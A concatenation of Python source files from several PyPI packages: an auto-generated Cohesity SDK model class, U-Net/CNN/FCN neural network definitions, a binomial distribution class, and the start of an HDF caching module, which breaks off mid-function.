result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ResourcePerformanceNoIdByArrayGetResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ResourcePerformanceNoIdByArrayGetResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
PypiClean
|
/cohesity-sdk-1.1.0.tar.gz/cohesity-sdk-1.1.0/cohesity_sdk/cluster/model/physical_object_protection_response_params.py
|
import re # noqa: F401
import sys # noqa: F401
from cohesity_sdk.cluster.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from cohesity_sdk.cluster.model.physical_file_protection_group_params import PhysicalFileProtectionGroupParams
from cohesity_sdk.cluster.model.physical_object_protection_params import PhysicalObjectProtectionParams
from cohesity_sdk.cluster.model.physical_volume_protection_group_params import PhysicalVolumeProtectionGroupParams
globals()['PhysicalFileProtectionGroupParams'] = PhysicalFileProtectionGroupParams
globals()['PhysicalObjectProtectionParams'] = PhysicalObjectProtectionParams
globals()['PhysicalVolumeProtectionGroupParams'] = PhysicalVolumeProtectionGroupParams
class PhysicalObjectProtectionResponseParams(ModelComposed):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
('object_protection_type',): {
'None': None,
'KFILE': "kFile",
'KVOLUME': "kVolume",
},
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'object_protection_type': (str, none_type,), # noqa: E501
'file_object_protection_type_params': (PhysicalFileProtectionGroupParams,), # noqa: E501
'volume_object_protection_type_params': (PhysicalVolumeProtectionGroupParams,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'object_protection_type': 'objectProtectionType', # noqa: E501
'file_object_protection_type_params': 'fileObjectProtectionTypeParams', # noqa: E501
'volume_object_protection_type_params': 'volumeObjectProtectionTypeParams', # noqa: E501
}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
'_composed_instances',
'_var_name_to_model_instances',
'_additional_properties_model_instances',
])
@convert_js_args_to_python_args
def __init__(self, object_protection_type, *args, **kwargs): # noqa: E501
"""PhysicalObjectProtectionResponseParams - a model defined in OpenAPI
Args:
object_protection_type (str, none_type): Specifies the Physical Object Protection type.
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
file_object_protection_type_params (PhysicalFileProtectionGroupParams): [optional] # noqa: E501
volume_object_protection_type_params (PhysicalVolumeProtectionGroupParams): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
constant_args = {
'_check_type': _check_type,
'_path_to_item': _path_to_item,
'_spec_property_naming': _spec_property_naming,
'_configuration': _configuration,
'_visited_composed_classes': self._visited_composed_classes,
}
required_args = {
'object_protection_type': object_protection_type,
}
model_args = {}
model_args.update(required_args)
model_args.update(kwargs)
composed_info = validate_get_composed_info(
constant_args, model_args, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
unused_args = composed_info[3]
for var_name, var_value in required_args.items():
setattr(self, var_name, var_value)
for var_name, var_value in kwargs.items():
if var_name in unused_args and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
not self._additional_properties_model_instances:
# discard variable.
continue
setattr(self, var_name, var_value)
@cached_property
def _composed_schemas():
# we need this here to make our import statements work
# we must store _composed_schemas in here so the code is only run
# when we invoke this method. If we kept this at the class
# level we would get an error beause the class level
# code would be run when this module is imported, and these composed
# classes don't exist yet because their module has not finished
# loading
lazy_import()
return {
'anyOf': [
],
'allOf': [
PhysicalObjectProtectionParams,
],
'oneOf': [
],
}
|
PypiClean
|
/pycamia-1.0.38-py3-none-any.whl/micomputing/network.py
|
from pycamia import info_manager
__info__ = info_manager(
project = "PyCAMIA",
package = "micomputing",
author = "Yuncheng Zhou",
create = "2022-03",
fileinfo = "File containing U-net and convolutional networks.",
help = "Use `from micomputing import *`.",
requires = "batorch"
).check()
__all__ = """
U_Net
CNN
FCN
""".split()
import math
with __info__:
import batorch as bt
from batorch import nn
def parse(string):
if string.count('(') > 1 or string.count(')') > 1: raise TypeError("Invalid to parse: " + string + ". ")
if string.count('(') == 0 and string.count(')') == 0: string += '()'
return eval('("' + string.lower().replace('(', '", (').replace(')', ',)').replace('(,)', '()') + ')')
def cat(*tensors): return bt.cat(tensors, 1)
def combine(list_of_items, reduction):
if len(list_of_items) >= 2:
z = reduction(list_of_items[0], list_of_items[1])
for i in range(2, len(list_of_items)):
z = reduction(z, list_of_items[i])
else: z = list_of_items[0]
return z
class Convolution_Block(nn.Module):
def __init__(self, in_channels, out_channels, **params):
'''
::parameters:
dimension (int): The dimension of the images.
in_channels (int): The input channels for the block.
out_channels (int): The output channels for the block.
conv_num (int): The number of convolution layers.
kernel_size (int): The size of the convolution kernels.
padding (int): The image padding for the convolutions.
activation_function (class): The activation function.
active_args (dict): The arguments for the activation function.
conv_block (str): A string with possible values in ('conv', 'dense', 'residual'), indicating which kind of block the U-Net is using: normal convolution layers, DenseBlock or ResidualBlock.
res_type (function): The combining type for the residual connections.
'''
super().__init__()
default_values = {'dimension': 2, 'conv_num': 1, 'padding': 1, 'kernel_size': 3, 'conv_block': 'conv', 'res_type': bt.add, 'activation_function': nn.ReLU, 'active_args': {}}
param_values = {}
param_values.update(default_values)
param_values.update(params)
self.__dict__.update(param_values)
self.in_channels = in_channels
self.out_channels = out_channels
self.layers = nn.ModuleList()
for i in range(self.conv_num):
ic = self.in_channels if i == 0 else ((self.out_channels * i + self.in_channels) if self.conv_block == 'dense' else self.out_channels)
conv = eval('nn.Conv%dd' % self.dimension)(ic, self.out_channels, self.kernel_size, 1, self.padding)
initialize_model, initialize_params = parse(self.initializer)
eval('nn.init.%s_' % initialize_model)(conv.weight, *initialize_params)
if self.conv_block != 'dense': self.layers.append(conv)
oc = (self.out_channels * i + self.in_channels) if self.conv_block == 'dense' else self.out_channels
self.layers.append(eval('nn.BatchNorm%dd' % self.dimension)(oc))
if i < self.conv_num: self.layers.append(self.activation_function(**self.active_args))
if self.conv_block == 'dense': self.layers.append(conv)
def forward(self, x):
if self.conv_block == 'dense':
conv_results = [x]
conv_layer = True
for layer in self.layers:
if conv_layer: x = layer(bt.cat([bt.crop_as(l, conv_results[-1]) for l in conv_results], 1))
else: x = layer(x)
conv_layer = layer.__class__.__name__.startswith('Conv')
if conv_layer: conv_results.append(x)
return self.activation_function(**self.active_args)(x)
else:
y = x
for layer in self.layers: y = layer(y)
if self.conv_block == 'residual': z = self.res_type(bt.crop_as(x, y), y)
else: z = y
return self.activation_function(**self.active_args)(z)
class U_Net(nn.Module):
class Softmax(nn.Module):
def forward(self, x): return nn.functional.softmax(x, 1)
class Encoder_Block(nn.Module):
def __init__(self, in_channels, out_channels, has_pooling, params):
super().__init__()
block_params = params.copy()
block_params.update({'in_channels': in_channels, 'out_channels': out_channels, 'has_pooling': has_pooling})
self.__dict__.update(block_params)
if has_pooling: self.pooling = eval('nn.MaxPool%dd' % self.dimension)(self.pooling_size, ceil_mode = True)
self.conv_block = Convolution_Block(**block_params)
def forward(self, x):
if self.has_pooling: y = self.pooling(x)
else: y = x
return self.conv_block(y)
class Decoder_Block(nn.Module):
def __init__(self, list_of_encoders, in_channels, out_channels, params, copies_of_inputs):
super().__init__()
block_params = params.copy()
block_params.update({'in_channels': in_channels, 'out_channels': out_channels})
self.__dict__.update(block_params)
if self.skip_type == cat: to_channels = in_channels - list_of_encoders[0].out_channels
else: assert all([in_channels == encoder.out_channels for encoder in list_of_encoders]); to_channels = in_channels
self.upsampling = eval('nn.ConvTranspose%dd' % self.dimension)(in_channels * copies_of_inputs, to_channels, self.pooling_size, self.pooling_size, 0)
block_params.update({'in_channels': to_channels + sum([encoder.out_channels for encoder in list_of_encoders]), 'out_channels': out_channels})
self.conv_block = Convolution_Block(**block_params)
def forward(self, x, list_of_encoder_results):
y = self.upsampling(x)
if self.padding == self.kernel_size // 2:
to_combine = list_of_encoder_results + [bt.crop_as(y, list_of_encoder_results[0])]
else: to_combine = [bt.crop_as(encoder_result, y) for encoder_result in list_of_encoder_results] + [y]
joint = combine(to_combine, self.skip_type)
return self.conv_block(joint)
def __init__(self, **params):
'''
::paramerters:
dimension (int): The dimension of the images. For conventional U-Net, it is 2.
depth (int): The depth of the U-Net. The conventional U-Net has a depth of 4 there are 4 pooling layers and 4 up-sampling layers.
conv_num (int): The number of continuous convolutions in one block. In a conventional U-Net, this is 2.
padding (int or str): Indicate the type of padding used. In a conventional U-Net, padding should be 0 but yet the default value is 'SAME' here.
in_channels (int): The number of channels for the input. In a conventional U-Net, it should be 1.
out_channels (int): The number of channels for the output. In a conventional U-Net, it should be 2.
block_channels (int): The number of channels for the first block if a number is provided. In a conventional U-Net, it should be 64.
If a list is provided, the length should be the same as the number of blocks plus two (2 * depth + 3). It represents the channels before and after each block (with the output channels included).
Or else, a function may be provided to compute the output channels given the block index (-1 ~ 2 * depth + 1) [including input_channels at -1 and output_channels at 2 * depth + 1].
kernel_size (int): The size of the convolution kernels. In a conventional U-Net, it should be 3.
pooling_size (int): The size of the pooling kernels. In a conventional U-Net, it should be 2.
// keep_prob (float): The keep probability for the dropout layers.
conv_block (str): A string with possible values in ('conv', 'dense', 'residual'), indicating which kind of block the U-Net is using: normal convolution layers, DenseBlock or ResidualBlock.
multi_arms (str): A string with possible values in ('shared(2)', 'seperate(2)'), indicating which kind of encoder arms are used.
multi_arms_combine (function): The combining type for multi-arms. See skip_type for details.
skip_type (function): The skip type for the skip connections. The conventional U-Net has a skip connect of catenation (cat). Other possible skip types include torch.mul or torch.add.
res_type (function): The combining type for the residual connections. It should be torch.add in most occasions.
activation_function (class): The activation function used after the convolution layers. nn.ReLU by default.
active_args (dict): The arguments for the activation function. {} by default.
initializer (str): A string indicating the initialing strategy. Possible values are normal(0, 0.1) or uniform(-0.1, 0.1) or constant(0) (all parameters can be changed)
with_softmax (bool): Whether a softmax layer is applied at the end of the network.
cum_layers (list): A list consisting two numbers [n, m] indicating that the result would be a summation of the upsamples of the results of the nth to the mth (included) blocks, block_numbers are in range 0 ~ 2 * depth.
The negative indices are allowed to indicate the blocks in a inversed order with -1 representing the output for the last block.
'''
super().__init__()
default_values = {'dimension': 2, 'depth': 4, 'conv_num': 2, 'padding': 'SAME', 'in_channels': 1, 'out_channels': 2, 'block_channels': 64, 'kernel_size': 3, 'pooling_size': 2, 'keep_prob': 0.5, 'conv_block': 'conv', 'multi_arms': "shared", 'multi_arms_combine': cat, 'skip_type': cat, 'res_type': bt.add, 'activation_function': nn.ReLU, 'active_args': {}, 'initializer': "normal(0, 0.1)", 'with_softmax': True, 'cum_layers': -1}
param_values = {}
param_values.update(default_values)
param_values.update(params)
self.__dict__.update(param_values)
if isinstance(self.block_channels, int):
self.block_channels = [self.in_channels] + [self.block_channels << min(i, 2 * self.depth - i) for i in range(2 * self.depth + 1)] + [self.out_channels]
bchannels = self.block_channels
if not callable(self.block_channels): self.block_channels = lambda i: bchannels[i + 1]
if isinstance(self.padding, str): self.padding = {'SAME': self.kernel_size // 2, 'ZERO': 0, 'VALID': 0}.get(self.padding.upper(), self.kernel_size // 2)
if isinstance(self.cum_layers, int): self.cum_layers = [self.cum_layers, self.cum_layers]
l, u = self.cum_layers
l = (l + 2 * self.depth + 1) % (2 * self.depth + 1)
u = (u + 2 * self.depth + 1) % (2 * self.depth + 1)
if l > u: l, u = u, l
self.cum_layers = [max(l, self.depth), min(u, 2 * self.depth)]
param_values = {k: self.__dict__[k] for k in param_values}
self.arm_type, self.arm_num = parse(self.multi_arms)
self.arm_num = 1 if len(self.arm_num) == 0 else self.arm_num[0]
if self.arm_type == 'shared': self.dif_arm_num = 1
else: self.dif_arm_num = self.arm_num
for iarm in range(self.dif_arm_num):
for k in range(self.depth + 1):
setattr(self, 'block%d_%d' % (k, iarm), self.Encoder_Block(self.block_channels(k - 1), self.block_channels(k), k != 0, param_values))
for k in range(self.cum_layers[0], self.depth + 1):
conv = eval('nn.Conv%dd' % self.dimension)(self.block_channels(k), self.block_channels(2 * self.depth + 1), 1, 1, 0)
initialize_model, initialize_params = parse(self.initializer)
eval('nn.init.%s_' % initialize_model)(conv.weight, *initialize_params)
if k < self.cum_layers[1]:
setattr(self, 'block%dout' % k, nn.Sequential(conv, self.activation_function(**self.active_args)))
setattr(self, 'out%dupsample' % k, eval('nn.ConvTranspose%dd' % self.dimension)(
self.block_channels(2 * self.depth + 1), self.block_channels(2 * self.depth + 1), self.pooling_size, self.pooling_size, 0
))
else: setattr(self, 'block%dout' % k, conv)
for k in range(self.depth + 1, self.cum_layers[1] + 1):
setattr(self, 'block%d' % k, self.Decoder_Block(
[getattr(self, 'block%d_%d' % (2 * self.depth - k, iarm)) for iarm in range(self.dif_arm_num)] * (self.arm_num // self.dif_arm_num),
self.block_channels(k - 1), self.block_channels(k), param_values,
self.arm_num if k == self.depth + 1 and self.multi_arms_combine == cat else 1
))
conv = eval('nn.Conv%dd' % self.dimension)(self.block_channels(k), self.block_channels(2 * self.depth + 1), 1, 1, 0)
initialize_model, initialize_params = parse(self.initializer)
eval('nn.init.%s_' % initialize_model)(conv.weight, *initialize_params)
if k < self.cum_layers[1]:
setattr(self, 'block%dout' % k, nn.Sequential(conv, self.activation_function(**self.active_args)))
setattr(self, 'out%dupsample' % k, eval('nn.ConvTranspose%dd' % self.dimension)(
self.block_channels(2 * self.depth + 1), self.block_channels(2 * self.depth + 1), self.pooling_size, self.pooling_size, 0
))
else: setattr(self, 'block%dout' % k, conv)
if self.with_softmax: self.softmax = self.Softmax()
def forward(self, x):
size = x.size()[1:]
if len(size) == self.dimension and self.in_channels == 1: x = x.unsqueeze(1)
elif len(size) == self.dimension + 1 and self.in_channels * self.arm_num == size[0]: pass
else: raise ValueError("The input tensor does not correspond to the U-Net structure. ")
assert size[0] % self.arm_num == 0
inputs = x.split(size[0] // self.arm_num, 1)
assert len(inputs) == self.arm_num
for i, y in enumerate(inputs):
for k in range(self.depth + 1):
y = getattr(self, 'block%d_%d' % (k, 0 if self.arm_type == 'shared' else i))(y)
setattr(self, 'block%d_%dresult' % (k, i), y)
to_combine = [getattr(self, 'block%d_%dresult' % (self.depth, i)) for i in range(self.arm_num)]
z = combine(to_combine, self.multi_arms_combine)
setattr(self, 'block%dresult' % self.depth, z)
for k in range(self.depth + 1, self.cum_layers[1] + 1):
z = getattr(self, 'block%d' % k)(z, [getattr(self, 'block%d_%dresult' % (2 * self.depth - k, iarm)) for iarm in range(self.arm_num)])
setattr(self, 'block%dresult' % k, z)
t = 0
for k in range(self.cum_layers[0], self.cum_layers[1] + 1):
setattr(self, 'block_out%dresult' % k, getattr(self, 'block%dout' % k)(getattr(self, 'block%dresult' % k)) + t)
if k < self.cum_layers[1]: t = getattr(self, 'out%dupsample' % k)(getattr(self, 'block_out%dresult' % k))
if self.with_softmax: return self.softmax(getattr(self, 'block_out%dresult' % k))
else: return getattr(self, 'block_out%dresult' % k)
def optimizer(self, lr=0.001): return bt.Optimization(bt.optim.Adam, self.parameters(), lr)
def loss(self, x, y):
y_hat = self(x)
clamped = y_hat.clamp(1e-10, 1.0)
self.y_hat = y_hat
return - bt.sum(y * bt.log(clamped), 1).mean().mean()
def __getitem__(self, i):
if self.arm_num == 1 and i <= self.depth: i = (i, 0)
return getattr(self, 'block%dresult' % i if isinstance(i, int) else 'block%d_%dresult' % i)
def __iter__(self):
for i in range(2 * self.depth + 1):
if i <= self.depth:
for iarm in range(self.arm_num):
yield 'block%d_%dresult' % (i, iarm), (i, iarm)
else: yield 'block%dresult' % i, i
class CNN(U_Net):
def __init__(self, dimension = 2, blocks = 5, conv_num = 2, padding = 'SAME',
in_channels = 1, out_elements = 2, layer_channels = 64, kernel_size = 3,
pooling_size = 2, keep_prob = 0.5, conv_block = 'conv', multi_arms = "shared",
multi_arms_combine = cat, res_type = bt.add, activation_function = nn.ReLU,
active_args = {}, initializer = "normal(0, 0.1)", with_softmax = True):
'''
::paramerters:
dimension (int): The dimension of the images. For conventional VGG, it is 2.
blocks (int): The number of the downsampling blocks. The conventional VGG has 5 blocks.
conv_num (int or list of length 'blocks'): The number of continuous convolutions in one block. In VGG, this is [2, 2, 3, 3, 3]. If the numbers for all blocks are the same, one can use one integer.
padding (int or str): Indicate the type of padding used. In a conventional VGG, padding is 'SAME' indicating .
in_channels (int): The number of channels for the input. In a conventional VGG, it should be 1.
out_elements (int): The number of channels for the output, as the number of classification. In a conventional VGG, it should be 1000 for 1000 classes.
layer_channels (int or list of length 'blocks'): The number of channels for each block. In a VGG, it should be [64, 128, 256, 512, 512].
Or else, a function may be provided to compute the output channels given the block index (-1 ~ 2 * depth + 1).
kernel_size (int): The size of the convolution kernels. In a conventional U-Net, it should be 3.
pooling_size (int): The size of the pooling kernels. In a conventional U-Net, it should be 2.
// keep_prob (float): The keep probability for the dropout layers.
conv_block (str): A string with possible values in ('conv', 'dense', 'residual'), indicating which kind of block the U-Net is using: normal convolution layers, DenseBlock or ResidualBlock.
multi_arms (str): A string with possible values in ('shared(2)', 'seperate(2)'), indicating which kind of encoder arms are used.
multi_arms_combine (function): The combining type for multi-arms. See skip_type for details.
skip_type (function): The skip type for the skip connections. The conventional U-Net has a skip connect of catenation (cat). Other possible skip types include torch.mul or torch.add.
res_type (function): The combining type for the residual connections. It should be torch.add in most occasions.
activation_function (class): The activation function used after the convolution layers. nn.ReLU by default.
active_args (dict): The arguments for the activation function. {} by default.
initializer (str): A string indicating the initialing strategy. Possible values are normal(0, 0.1) or uniform(-0.1, 0.1) or constant(0) (all parameters can be changed)
with_softmax (bool): Whether a softmax layer is applied at the end of the network.
cum_layers (list): A list consisting two numbers [n, m] indicating that the result would be a summation of the upsamples of the results of the nth to the mth (included) blocks, block_numbers are in range 0 ~ 2 * depth. The negative indices are allowed to indicate the blocks in a inversed order with -1 representing the output for the last block.
'''
depth = blocks - 1
if isinstance(layer_channels, int):
maxlc = layer_channels
layer_channels = [in_channels]
multiplier = int(math.pow(maxlc / in_channels, 1 / (depth + 1)))
for i in range(depth):
layer_channels.append(layer_channels[-1] * multiplier)
layer_channels.append(maxlc)
layer_channels.extend([0] * depth)
layer_channels.append(out_elements)
super().__init__(dimension = dimension, depth = depth, conv_num = conv_num,
padding = padding, in_channels = in_channels, out_channels = out_elements,
block_channels = layer_channels, kernel_size = kernel_size,
pooling_size = pooling_size, keep_prob = keep_prob, conv_block = conv_block,
multi_arms = multi_arms, multi_arms_combine = multi_arms_combine, skip_type = None,
res_type = res_type, activation_function = activation_function, active_args = active_args,
initializer = initializer, with_softmax = with_softmax, cum_layers = depth)
def forward(self, x):
wsm = self.with_softmax
self.with_softmax = False
if wsm: r = self.softmax(super().forward(x).flatten(2).mean(-1))
else: r = super().forward(x).flatten(2).mean(-1)
self.with_softmax = wsm
return r
class FCN(nn.Module):
class Softmax(nn.Module):
def forward(self, x): return nn.functional.softmax(x, 1)
def __init__(self, layers = 4, in_elements = 1, out_elements = 2, layer_elements = 64,
keep_prob = 0.5, activation_function = nn.ReLU, active_args = {},
initializer = "normal(0, 0.1)", with_softmax = True):
if isinstance(layer_elements, int):
maxlc = layer_elements
layer_elements = [in_elements]
multiplier = int(bt.pow(maxlc / in_elements, 1 / (layers // 2 + 1)))
for i in range(layers // 2 - 1):
layer_elements.append(layer_elements[-1] * multiplier)
layer_elements.append(maxlc)
if layers % 2 == 0: layer_elements.extend(layer_elements[-2::-1])
else: layer_elements.extend(layer_elements[::-1])
layer_elements[-1] = out_elements
if isinstance(layer_elements, list):
lc = layer_elements.copy()
layer_elements = lambda i: lc[i]
self.layers = []
for l in range(layers):
fcl = nn.Linear(layer_elements(l), layer_elements(l+1))
initialize_model, initialize_params = parse(initializer)
eval('nn.init.%s_' % initialize_model)(fcl.weight, *initialize_params)
self.layers.append(fcl)
if l < layers - 1:
self.layers.append(activation_function(**active_args))
self.layers.append(nn.Dropout(keep_prob))
elif with_softmax:
self.layers.append(self.Softmax())
self.struct = nn.Sequential(*self.layers)
def forward(self, x):
return self.struct(x)
if __name__ == "__main__":
# unet = U_Net(multi_arms="seperate(3)", block_channels=16)
# print(unet(bt.rand(10, 3, 100, 100)).size())
# print(*[x + ' ' + str(unet[i].size()) for x, i in unet], sep='\n')
unet = U_Net(
dimension=3,
in_channels=2,
out_channels=3,
block_channels=4,
with_softmax=False,
initializer="normal(0.0, 0.9)",
# conv_block='dense',
# conv_num=4,
# active_args={'inplace': True}
)
print(unet(bt.rand(10, 2, 50, 50, 50)).size())
print(*[x + ' ' + str(unet[i].size()) for x, i in unet], sep='\n')
|
PypiClean
|
/distributions_lz-0.1.tar.gz/distributions_lz-0.1/distributions_lz/Binomialdistribution.py
|
import math
import matplotlib.pyplot as plt
from .Generaldistribution import Distribution
class Binomial(Distribution):
""" Binomial distribution class for calculating and
visualizing a Binomial distribution.
Attributes:
mean (float) representing the mean value of the distribution
stdev (float) representing the standard deviation of the distribution
data_list (list of floats) a list of floats to be extracted from the data file
p (float) representing the probability of an event occurring
n (int) number of trials
TODO: Fill out all functions below
"""
def __init__(self, prob=.5, size=20):
self.n = size
self.p = prob
Distribution.__init__(self, self.calculate_mean(), self.calculate_stdev())
def calculate_mean(self):
"""Function to calculate the mean from p and n
Args:
None
Returns:
float: mean of the data set
"""
self.mean = self.p * self.n
return self.mean
def calculate_stdev(self):
"""Function to calculate the standard deviation from p and n.
Args:
None
Returns:
float: standard deviation of the data set
"""
self.stdev = math.sqrt(self.n * self.p * (1 - self.p))
return self.stdev
def replace_stats_with_data(self):
"""Function to calculate p and n from the data set
Args:
None
Returns:
float: the p value
float: the n value
"""
self.n = len(self.data)
self.p = 1.0 * sum(self.data) / len(self.data)
self.mean = self.calculate_mean()
self.stdev = self.calculate_stdev()
def plot_bar(self):
"""Function to output a histogram of the instance variable data using
matplotlib pyplot library.
Args:
None
Returns:
None
"""
plt.bar(x = ['0', '1'], height = [(1 - self.p) * self.n, self.p * self.n])
plt.title('Bar Chart of Data')
plt.xlabel('outcome')
plt.ylabel('count')
def pdf(self, k):
"""Probability density function calculator for the gaussian distribution.
Args:
x (float): point for calculating the probability density function
Returns:
float: probability density function output
"""
a = math.factorial(self.n) / (math.factorial(k) * (math.factorial(self.n - k)))
b = (self.p ** k) * (1 - self.p) ** (self.n - k)
return a * b
def plot_bar_pdf(self):
"""Function to plot the pdf of the binomial distribution
Args:
None
Returns:
list: x values for the pdf plot
list: y values for the pdf plot
"""
x = []
y = []
# calculate the x values to visualize
for i in range(self.n + 1):
x.append(i)
y.append(self.pdf(i))
# make the plots
plt.bar(x, y)
plt.title('Distribution of Outcomes')
plt.ylabel('Probability')
plt.xlabel('Outcome')
plt.show()
return x, y
def __add__(self, other):
"""Function to add together two Binomial distributions with equal p
Args:
other (Binomial): Binomial instance
Returns:
Binomial: Binomial distribution
"""
try:
assert self.p == other.p, 'p values are not equal'
except AssertionError as error:
raise
result = Binomial()
result.n = self.n + other.n
result.p = self.p
result.calculate_mean()
result.calculate_stdev()
return result
def __repr__(self):
"""Function to output the characteristics of the Binomial instance
Args:
None
Returns:
string: characteristics of the Gaussian
"""
return "mean {}, standard deviation {}, p {}, n {}".\
format(self.mean, self.stdev, self.p, self.n)
|
PypiClean
|
/cgptoolbox-0.1.2.zip/cgptoolbox-0.1.2/cgp/utils/hdfcache.py
|
# for merging iterators
import itertools
from contextlib import nested
from glob import glob
import os
from ..utils.poormanslock import Lock
import shutil
# for handling numpy record arrays and HDF tables
import tables as pt
import numpy as np
from ..utils.argrec import autoname
# for decorating
import inspect
from functools import wraps
import time
# logging facilities, useful for debugging
import logging
# # To use Gael Varoquaux' joblib.hash() rather than the built-in one.
# try:
# from joblib import hash as ahash
# except ImportError:
# pass
log = logging.getLogger("hdfcache")
log.addHandler(logging.StreamHandler())
# tab-delimited format string,
# see http://docs.python.org/library/logging.html#formatter-objects
fmtstr = "%(" + ")s\t%(".join(
"asctime levelname name lineno process message".split()) + ")s"
log.handlers[0].setFormatter(logging.Formatter(fmtstr))
def ahash(x):
"""
Hash the raw data of a Numpy array
The input will be converted to a Numpy array if possible.
The shape and dtype of the array does not enter into the hash.
>>> x = np.arange(5)
>>> y = np.arange(5)
>>> ahash(x) == ahash(y) == ahash(range(5))
True
"""
x = np.asarray(x)
x.setflags(write=False)
return hash(x.data)
class NoHdfcache(object):
"""A caricature of a caching decorator that does not actually cache"""
def __init__(self, filename):
"""Initialize resources shared among caches"""
pass
def cache(self, func):
"""
A null decorator implemented as an instance method
>>> nohdfcache = NoHdfcache("dummy.filename")
>>> @nohdfcache.cache
... def f(x): return x * x
>>> @nohdfcache.cache
... def g(y): return y * y * y
>>> f(2)
4
>>> g(3)
27
"""
return func
class DictHdfcache(object):
"""Prototype of caching using a shared resource (a dict)"""
def __init__(self, filename):
"""Initialize a single dict that will hold multiple caches"""
self.d = {} # owns all the caches, similar to a HDF5 File object
self.argspec = {} # prototype for making "args" Table
self.output_type = {} # deferring details of storage to later
def cache(self, func):
"""
Cache a function, using a resource in scope of an object instance
Note that "self" is in scope of the decorator method, providing access
to shared resources. By contrast, the scope of "func" is limited to
each decoration. Each decoration involves a single call to cache().
It initializes any sub-resources specific to "func".
Finally, it defines the actual wrapper as a plain function, but one
whose scope includes both "self" and "func".
Access to "self" preserves information (the cache) between calls to the
wrapped function. Because it is a plain function, it can adopt the
docstring of func by use of @wraps(func).
Details of the caching can be deferred until the required information
is available, like knowing the dtype of an output array before creating
a corresponding HDF table.
Verifying what's going on...
>>> dicthdfcache = DictHdfcache("dummy.filename")
>>> @dicthdfcache.cache
... def f(x): return x * x
cache: initializing resources for a decorated function
>>> f(2)
cache: computed f 2 => 4
cache: deferred initialization
4
>>> f(3)
cache: computed f 3 => 9
9
>>> f(3)
cache: returning cached value
9
Create another cache using the same resource (a dict); the end result
is shown below.
>>> @dicthdfcache.cache
... def g(y): return y * y * y
cache: initializing resources for a decorated function
>>> g(3)
cache: computed g 3 => 27
cache: deferred initialization
27
Here's the dictionary with the two caches.
>>> srt = sorted(dicthdfcache.d.items(), key=lambda x: x[0].__name__)
>>> for k, v in srt:
... print k, sorted(v.items(), key=lambda x: x[-1])
<function f at 0x...> [(..., 4), (..., 9)]
<function g at 0x...> [(..., 27)]
A function with both required, default, and variable-length unnamed and
keyword arguments.
>>> @dicthdfcache.cache
... def h(a, b=10, *args, **kwargs): pass
cache: initializing resources for a decorated function
Here are the argument specifications, which could be used for deferred
specification of an "args" table.
>>> sorted(dicthdfcache.argspec.items(), key=lambda x: x[0].__name__)
[(<function f at 0x...>,
ArgSpec(args=['x'], varargs=None, keywords=None, defaults=None)),
(<function g at 0x...>,
ArgSpec(args=['y'], varargs=None, keywords=None, defaults=None)),
(<function h at 0x...>,
ArgSpec(args=['a', 'b'], varargs='args', keywords='kwargs',
defaults=(10,)))]
"""
print "cache: initializing resources for a decorated function"
self.d[func] = {} # nested dictionary, like a cache Group in a File
self.argspec[func] = inspect.getargspec(func)
@wraps(func)
